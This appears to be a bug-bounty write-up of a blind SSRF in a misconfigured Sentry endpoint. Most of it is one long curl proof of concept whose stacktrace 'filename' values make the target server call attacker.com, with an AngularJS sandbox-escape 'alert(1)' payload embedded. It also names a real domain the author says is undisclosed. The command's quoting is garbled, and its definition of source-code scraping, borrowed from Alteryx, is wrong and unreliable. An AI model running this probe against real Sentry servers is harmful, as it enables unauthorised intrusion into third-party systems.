Blind SSRF - Sentry Misconfiguration
Summary :
Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application’s front-end response.
The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF vulnerabilities because of their one-way nature. They cannot be trivially exploited to retrieve sensitive data from back-end systems, although in some situations they can be exploited to achieve full remote code execution. The most reliable way to detect blind SSRF vulnerabilities is using out-of-band (OAST) techniques. You can also find Blind SSRF using burp collaborator.
I found this vulnerability on one of the responsible disclosure. I won’t be able to disclose the name as the issue is not resolved yet. This vulnerability was due to sentry misconfiguration because the source code scraping was not turned off. If it is turned on, then server that has Sentry on it will make blind get requests everywhere controlled from outside via error reporting.
What is source code scraping ?
It involves the extraction of data from websites by fetching/downloading a webpage, before parsing the content into whatever software you are using (in our case, Alteryx) whereby you can manipulate/prep it like you would any other data.
More info : https://forum.sentry.io/t/source-code-scrapping/4167
How to find this vulnerability ?
- Go to the target website that uses sentry
- Spider that website using Burp Suite and you’ll find an endpoint that uses sentry like : /api/14/store/?sentry_version=7&sentry_client=raven-js%2F3.27.0&sentry_key=<key>
- This endpoint has a request body which has the parameter called “filename” which is vulnerable to blind ssrf and will make blind GET request to your server
How to reproduce :
curl -i -s -k -X $’POST’ \ -H $’Host: target.com’ -H $’Connection: close’ -H $’Content-Length: 9031' -H $’Origin: ‘https://target.com’-H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' -H $’Content-Type: application/csp-report’ -H $’Accept: */*’ -H $’Accept-Encoding: gzip, deflate’ -H $’Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \ — data-binary $’{\”project\”:\”30\”,\”logger\”:\”javascript\”,\”platform\”:\”javascript\”,\”request\”:{\”headers\”:{\”User-Agent\”:\”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\”,\”Referer\”:\”https://attacker.com/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c\"},\"url\":\"https://attacker.com/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\"},\"exception\":{\"values\":[{\"type\":\"Error\",\"value\":\"Trying to get control scope but angular isn\’t ready yet or something like this\”,\”stacktrace\”:{\”frames\”:[{\”filename\”:\”https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":110,\"colno\":81071,\"function\":\"XMLHttpRequest.o\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":75069,\"function\":\"XMLHttpRequest.<anonymous>\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":71510,\"function\":\"k\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":23681,\"function\":\"Object.fireWith [as resolveWith]\”,\”in_app\”:true},{\”filename\”:\”https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":22924,\"function\":\"s\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":724721,\"function\":\"Object.n.(anonymous function) [as success]\”,\”in_app\”:true},{\”filename\”:\”https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725795,\"function\":\"Object.n.success\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":757703,\"function\":\"Object.executeInContext\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725917,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":723970,\"function\":\"c.json.c.toLowerCase.n.success.n.success\",\"in_app\":true},{\"filename\":\"https://attacker.com/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\",\"lineno\":2446,\"colno\":299,\"function\":\"ajaxOptions.success\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":313620,\"function\":\"NotificationCenter.<anonymous>\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":316137,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":542056,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":665829,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666057,\"function\":\"NotificationCenterDropdown._scatter\",\"in_app\":true},{\"filename\":\"<anonymous>\",\"lineno\":null,\"colno\":null,\"function\":\"Array.forEach\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666079,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":714602,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":713050,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":448313,\"function\":\"NotificationCenterOuterList.setValue\",\"in_app\":true},{\"filename\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":683081,\"function\":\"NotificationCenterOuterList.getScope\",\"in_app\":true}]}}]},\"transaction\":\"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"trimHeadFrames\":0,\"tags\":{\"AbonentId\":\"<id>\",\"UserId\":\"<id>\",\"OrganizationId\":\"<id>\"},\"extra\":{\"session:duration\":357},\"breadcrumbs\":{\"values\":[{\"timestamp\":1530367897.368,\"category\":\"sentry\",\"message\":\"$parse:lexerr: Lexer Error: Unterminated quote at columns 47–67 [\’x=1} } };alert(1));] in expression [\’a\’.constructor.prototype.charAt=[].join;$eval(\’x=1} } };alert(1));].\”,\”event_id\”:\”57575ae92ea2477d8ba3665017601f81\”,\”level\”:\”error\”},{\”timestamp\”:1530367897.373,\”message\”:\”Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47–67 [\’x=1} } };alert(1));] in expression [\’a\’.constructor.prototype.charAt=[].join;$eval(\’x=1} } };alert(1));].\\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2=\'a\'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval(\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\\n at c.$apply (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined\”,\”level\”:\”error\”,\”category\”:\”console\”},{\”timestamp\”:1530367897.415,\”category\”:\”sentry\”,\”message\”:\”Error: Trying to get control scope but angular isn\’t ready yet or something like this\”,\”event_id\”:\”<id>\”,\”level\”:\”error\”},{\”timestamp\”:1530367897.455,\”category\”:\”ui.click\”,\”message\”:\”input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\\\”text\\\”]\”},{\”timestamp\”:1530367897.54,\”type\”:\”http\”,\”category\”:\”xhr\”,\”data\”:{\”method\”:\”POST\”,\”url\”:\”https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=<id>&sessionid=40030075\",\"status_code\":200}},{\"timestamp\":1530367897.577,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"GET\",\"url\":\"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=<id>&sessionid=40030075&_=1530367897217\",\"status_code\":200}}]},\"user\":{\"id\":\"<id>"},\"release\":\"mobile_analitcs_redirect_fix e1293c0084a3\”,\”event_id\”:\”<id>\”}’ \ $’https://target.com/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=<key>'
Callbacks :
Thank You :)
Instagram : jerry._.3
